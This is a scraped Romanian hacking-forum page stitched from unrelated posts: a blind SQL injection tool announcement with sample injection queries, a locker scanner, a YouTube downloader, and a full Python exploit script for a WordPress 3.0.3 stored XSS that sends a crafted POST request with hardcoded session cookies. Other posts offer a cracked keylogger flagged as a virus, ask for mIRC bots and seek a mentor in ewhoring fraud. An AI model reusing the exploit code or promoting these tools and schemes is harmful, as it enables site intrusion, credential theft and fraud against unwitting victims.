Leaderboard

Scopul acestui programel este sa faca Blind Based sql injection. Cerinte minime: -Windows xp (testat pe windows 7) -Winsock.ocx Caracteristici: -Pentru fiecare litera de ghicit se foloseste cate un socket separat -Ca default ghiceste fiecare litera folosind codul ascii al fiecarui caracter cuprins intre 32 si 122 -Se poate defini un dictionar de catre utilizator bifind acea casuta -Se pot scoate variabile gen @@version, database() etc... sau selectii sub forma aceasta (select table_name from information_schema.tables where table_schema=database() limit 0,1) Casuta keyword se completeaza cu un cuvant care apare in sursa daca injectia este TRUE si dispare in momentul cand injectia este FALSE mai exact cuvantul cheie este un cuvant care face diferenta intre o injectie true sau false. Screenshot: Programul este aici: <sarcasm>Nu postez scan report de pe virus total ca sa va infectez pe toti muhahah</sarcasm> Sursa scrisa in anticul VB6: Zippyshare.com - blind.rar Si un demo frate: Pe viitor am sa aduc urmatoarele inbunatatiri: -Am sa adaug POST injection -Am sa mai imbunatatesc protocolul HTTP la unele da bad request -Injectiile vor veni cu WAF bypass ca default spatiile %20 vor fi inlocuite cu %0a -Inject_here option -Am sa incerc sa fac un prototip de timebased injection Pentru buguri contactati-ma pe PM. -Reparat bugul cu sursa de sub 8000 de caractere

Am scos din el : Command line options Kill by windows size Debug Kill full screen apps Tools WMI Am adaugat / imbunatatit : Physical memory scan (RAM) Shortcuts scan New 'Smart scan' technique Improved registry remover Auto uploading unknown lockers (if found by RAM scan) File scan (not only process scan) Screen Un mic demo : Download https://www.dropbox.com/s/09lns9sspnoa5jt/adlv3.exe?dl=0 Scan RazorScanner - Scan Result Q : Vreti sa fie mai bun ? A : Postati lockerele ce le gasiti pe NT-uri // @2/27/2015 1:19 AM system.componentmodel.win32exception FIX + Sabre Locker (Stub & Builder) FIX Ram Hang error @ 12:37 PM bug fix + Desktop VLocker + Goodies Survey Faster scan FIX process.id verification (major bug)

Lucrez de ceva timp la chestia asta si m-am gandit sa o impartasesc cu voi. Este o aplicatie simpla, facuta folosind doar C# pur. Aveti posibilitatea de a selecta calitatea video-ului in functie de conexiunea pe care stiti ca o aveti la net. Din pacate insa, are un mic bug si nu functioneaza pentru toate video-urile de pe Youtube. Sper sa remediez bug-ul in cel mai scurt timp si sa revin cu o varianta 100% functionala. Astept pareri / critici constructive / bug-uri. Aveti aici link-ul de download al aplicatiei .exe: Screens: Spor la download Le: Se foloseste de urmatoarele "librarii": nguyenvanduocit FlickrDownload Helper din Video Downloaderr

Plm am uitat, nu fii asa frustrat ca nu te intrec la posturi. Doar vreau sa ajut si eu putin comunitatea.

[h=2]Wordpress 3.0.3 Stored XSS Exploit[/h] #Exploit Title: Wordpress 3.0.3 Stored XSS exploit (IE7,6 NS8.1) [Revised] #Date: 14/01/2013 #Exploit Author: D35m0nd142 #Vendor Homepage: http://wordpress.org #Version: 3.0.3 #Special thanks to Saif #configuration is reconfigurable according to your own parameters. #!/usr/bin/python import sys,os,time,socket os.system("clear") print "-------------------------------------------------" print " Wordpress 3.0.3 Stored XSS exploit " print " Usage : ./exploit.py <wp website> <text> " print " Created by D35m0nd142 " print "-------------------------------------------------\n" time.sleep(1.5) wp_site = sys.argv[1] text = sys.argv[2] try: sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM) sock.connect((sys.argv[1],80)) request = "_wpnonce=aad1243dc1&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fpost.php%3Fpost%3D145%26action%3Dedit%26message% 3D1&user_ID=3&action=editpost&originalaction=editpost&post_author=3&post_type=post&original_post_status=publish&referredby=http%3A%2F%2F" request += sys.argv[1] request += "%2Fwordpress%2Fwp-admin%2Fpost.php%3Fpost%3D145%26action%3Dedit%26message%3D1&_wp_original_http_referer=http%3A%2F%2F" request += sys.argv[1] request += "%2Fwordpress%2Fwp-admin%2Fpost.php%3Fpost%3D145%26action%3Dedit%26message%3D1&post_ID=145&autosavenonce=e35a537141&meta-box-order-nonce=718e35f130&closedpostboxesnonce=0203f58029&wp-preview=&hidden_post_status=publish&post_status=publish&hidden_post_password=&hidden_post_visibility=public&visibility=public&post_password=&mm=12&jj=27&aa=2010&hh=15&mn=31&ss=55&hidden_mm=12&cur_mm=12&hidden_jj=27&cur_jj=27&hidden_aa=2010&cur_aa=2010&hidden_hh=15&cur_hh=16&hidden_mn=31&cur_mn=02&original_publish=Update&save=Update&post_category%5B%5D=0&post_category%5B%5D=1&tax_input%5Bpost_tag%5D=&newtag%5Bpost_tag%5D=&post_title=&samplepermalinknonce=ffcbf222eb&content=%3CIMG+STYLE%3D%22xss%3Aexpression%28alert%28%27XSS%27%29%29%22%3E&excerpt=&trackback_url=&meta%5B108%5D%5Bkey%5D=_edit_last&_ajax_nonce=257f6f6ad9&meta%5B108%5D%5Bvalue%5D=3&meta%5B111%5D%5Bkey%5D=_edit_lock&_ajax_nonce=257f6f6ad9&meta%5B111%5D%5Bvalue%5D=1293465765&meta%5B116%5D%5Bkey%5D=_encloseme&_ajax_nonce=257f6f6ad9&meta%5B116%5D%5Bvalue%5D=1&meta%5B110%5D%5Bkey%5D=_wp_old_slug&_ajax_nonce=257f6f6ad9&meta%5B110%5D%5Bvalue%5D=&metakeyselect=%23NONE%23&metakeyinput=&metavalue=&_ajax_nonce-add-meta=61de41e725&advanced_view=1&comment_status=open&ping_status=open&add_comment_nonce=c32341570f&post_name=145" print "--------------------------------------------------------------------------------------------------------------------------------------" print request print "--------------------------------------------------------------------------------------------------------------------------------------\n" length = len(request) poc = "<IMG STYLE='xss:expression(alert('%s'))'>'" %text print "Trying to execute attack on the remote system . . \nPOC: \n %s\n" %poc time.sleep(0.7) print "Sending %s bytes of data . . " % length time.sleep(2) sock.send("POST /wordpress/wp-admin/post.php HTTP/1.1\r\n") sock.send("Host: " + wp_site+"\r\n") sock.send("User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15)\r\n") sock.send("Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n") sock.send("Accept-Language: en-us,en;q=0.5\r\n") sock.send("Accept-Encoding: gzip,deflate\r\n") sock.send("Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n") sock.send("Keep-Alive: 300\r\n") sock.send("Proxy-Connection: keep-alive\r\n") sock.send("Referer:http://"+wp_site+"/wordpress/wp-admin/post.php?post=145&action=edit&message=1\r\n") #You can change the number of the variable 'post' sock.send("Cookie:wordpress_5bd7a9c61cda6e66fc921a05bc80ee93=xss%7C1293636697%7C17562b2ebe444d17730a2bbee6ceba99;wp-settings- time-1=1293196695; wp-settings-time-2=1293197912;wp-settings-1=m3%3Dc%26editor%3Dhtml; wp-settings-2=editor%3Dhtml%26m5%3Do;wp-settings-time-3=1293462654; wp-settings-3=editor%3Dhtml;wordpress_test_cookie=WP+Cookie+check;wordpress_logged_in_5bd7a9c61cda6e66fc921a05bc80ee93=xss%7C1293636697%7C7437e30b3242f455911b2b60daf35e48;PHPSESSID=a1e7d9fcce3d072b31162c4acbbf1c37;kaibb4443=80bdb2bb6b0274393cdd1e47a67eabbd;AEFCookies2525[aefsid]=kmxp4rfme1af9edeqlsvtfatf4rvu9aq\r\n") sock.send("Content-Type: application/x-www-form-urlencoded\r\n") sock.send("Content-Length:%d\n" %length) sock.send(request+"\r\n\r\n") print sock.recv(1024) print "\n[+] Exploit sent with success . Verify manually if the website has been exploited \n" except: print "[!] Error in your configuration or website not vulnerable \n" # 99F5C0A5380593CB 1337day.com [2013-01-15] 06CE9157954A5ED6 # Sursa: 1337day Inj3ct0r Exploit Database : vulnerability : 0day : shellcode by Inj3ct0r Team

Salut. Sunt nou in domeniu. Am gasit acest exploit care a fost folosit pentru a-mi sparge site-ul. Am incercat sa fac aceiasi pasi ca si cel care mi-a spart siteul doar ca dupa mesajul "Exploit sent with success . Verify manually if the website has been exploited :)" nu stiu ce sa mai fac. Nu reusesc sa inteleg ce face exploitul. Care este urmatorul pas. Multumesc si scuze daca am postat aiurea.

Eu zic sa vorbesti cu baietii, @Nytro sau cine se mai ocupa de contul de Git al comunitatii si sa puneti acolo sursa.

De ce nu-l faci sa descarce doar mp3-ul.. ? Sau adaugi si una si alta.

Link nou frate..nu mai merge ala..

Ca si o chestie, acum m-am gandit, ar fi ok sa scoti toate print-urile alea de la ce incearca threadurile, pentru ca in mare parte nu isi au rostul si parca strica oarecum aspectul. Si sa printezi doar rezultatul final. In rest merge foarte bine. Felicitari inca o data, si la mai multe.

hai ca e tare fraza spusa de catre tine =)

Salut as dori si eu o arhiva cu boti pentru mirc , ma poate ajuta cineva?

Este un logger foarte bun cu o multime de functii asemanatoare cu dracula logger. Este crackuit si detectat ca virus. download: Download Predator zip - Unlimited Fire Speed Downloads TRY AND ENJOY:)

Buna ziua, Este cineva pe aicea care se ocupa cu ewhoring ca eu nu ma prea descurc singur poate cineva sa devina mentor ii dau parte din castigurile mele.